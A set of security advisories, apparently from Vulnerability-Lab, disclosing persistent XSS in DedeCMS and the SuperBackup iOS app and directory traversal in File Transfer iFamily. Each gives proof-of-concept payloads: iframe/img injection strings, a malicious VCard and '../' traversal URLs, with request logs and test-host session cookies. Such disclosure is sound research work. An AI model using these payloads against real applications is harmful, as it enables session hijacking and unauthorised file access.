Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: https://test23.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/media_main.php
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
keyword=>"%20<<img
src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1830
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon,
06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/dede/file_pic_view.php
?activepath=%2Fuploads%2F>"
<"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer:
https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.6.40
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/include/dialog/select_media.php?
CKEditor=>"><iframe src=evil.source
onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source
onload=alert("2")>2&langCode=en
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1;
DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1137
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2


Reference(s):
https://test23.localhost:8080/dede/media_main.php
https://test23.localhost:8080/dede/tags_main.php
https://test23.localhost:8080/dede/file_pic_view.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/include/dialog/select_media.php


Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars on the
affected input fields
2. Restrict the vulnerable paramter prevent injects via post method request
3. Secure the output location were the content is insecure sanitized
delivered as output


Security Risk:
==============
The security risk of the application-side persistent cross site
scripting web vulnerabilities in the different modules are estimated as
medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™


-- 
Company Name: Vulnerability Laboratory (Vulnerability Lab)
Address: Ludwig-Erhard Straße 4 - 34131 Kassel (Germany)
Representative: Geschäftsführer & Administrator

Phone: +49(0)561-40085396
Fax:  +49(0)561-81024871
PGP:
https://www.vulnerability-lab.com/keys%2Fadmin%40vulnerability-lab.com(0x198E9928).txt
Domain: www.vulnerability-lab.com

Document Title:
===============
SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2202


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2202


Common Vulnerability Scoring System:
====================================
4.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them.
Fastest way to restore contacts from PC or Mac.
Export by mailing the backed up contacts file to yourself. Export
contacts file to any other app on your device.
Export all contacts directly to your PC / Mac over Wifi, no software
needed! Restore any contacts directly from
PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
app now.

(Copy of the Homepage:
https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site web vulnerabilities in the official SuperBackup
v2.0.5 ios mobile application.


Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered
in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise the mobile
web-application from the application-side.

The cross site scripting web vulnerabilities are located in the
`newPath`, `oldPath` & `filename` parameters of the vcf listing module.
Remote attackers are able to inject own malicious persistent script
codes as vcf filename to the main index list. The request method to
inject is POST and the attack vector of the vulnerability is located on
the application-side. The injection point is located at the vcf
filename or import. The execution point occurs in the main index list
after the import or insert.

Remote attackers are able to inject own script codes to the client-side
requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious source and
persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] VCF

Vulnerable Parameter(s):
[+] newPath (path - vcf filename)
[+] oldPath (path - vcf filename)


Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote
attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the cross site scripting
vulnerability follow the provided information and steps below to continue.


PoC: Payload (Filename)
>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>


PoC: Vulnerable Source (Listing - Index)
<button type="button" class="btn btn-default btn-xs button-download">
<span class="glyphicon glyphicon-download-alt"></span>
</button>
</td>
<td class="column-name"><p class="edit" title="Click to
rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
<td class="column-size">
<p>26.40 KB</p>
</td>
<td class="column-delete">
<button type="button" class="btn btn-danger btn-xs button-delete">
<span class="glyphicon glyphicon-trash"></span>
</button>
</td>
</tr></tbody></table>
</div>


PoC: Exception-Handling
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>
09:17:12:PM 10:Apr.:2020 .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source
onload=alert("PWND")></iframe> .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source
onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"


PoC: Exploit
BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
END:VCARD


--- PoC Session Logs [POST] ---
http://localhost/move
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/Contacts 09:17:12:PM 10:Apr.:2020
.vcf&newPath=/evil-filename>"<iframe src=evil.source
onload=alert("PWND")></iframe>.vc
-
POST: HTTP/1.1 500 Internal Server Error
Content-Length: 593
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close


Solution - Fix & Patch:
=======================
1. Parse and filter the vcf name values next to add, edit or imports to
prevent an execution
2. Restrict and filter in the index listing the vcf names to sanitize
the output


Security Risk:
==============
The security risk of the persistent vcf cross site scripting web
vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

Document Title:
===============
File Transfer iFamily v2.1 - Directory Traversal Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2199


Release Date:
=============
2020-04-14


Vulnerability Laboratory ID (VL-ID):
====================================
2199


Common Vulnerability Scoring System:
====================================
7.1


Vulnerability Class:
====================
Directory- or Path-Traversal


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Send photos, videos and documents to other devices without Internet. A
complete application to exchange files
wirelessly between devices. It uses the Multipeer Connectivity Framework
to search and connect to available devices,
without the need of internet connection or any kind of server and database.

(Copy of the Homepage:
https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575
)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory
traversal web vulnerability in the official File Transfer iFamily v2.1
ios mobile application.


Affected Product(s):
====================
DONG JOO CHO
Product: File Transfer iFamily v2.1 - iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the
official File Transfer iFamily v2.1 ios mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.

The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local ./etc/ path of the web-server by
changing the local path in the performed request itself.
In a first request the attack changes the path, the host redirects to
complete the adress with "..". Then the attacker just
attaches a final slash to its request and the path can be accessed via
web-browser to download local files.

Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.


Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with
access to the wifi interface in a local network without user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.


PoC: Exploitation
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
http://localhost//../


--- PoC Session Logs [GET]] ---
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
-
http://localhost../etc/
Host: localhost..
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- add slash to correct host adress (/.././)
http://localhost/./
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- Access granted
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the visible and
accessable ./etc/ path in the app container.
Disallow path changes in the client-side get method requests and
validate them securely.


Security Risk:
==============
The security risk of the directory travsersal web vulnerability in the
ios mobile application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com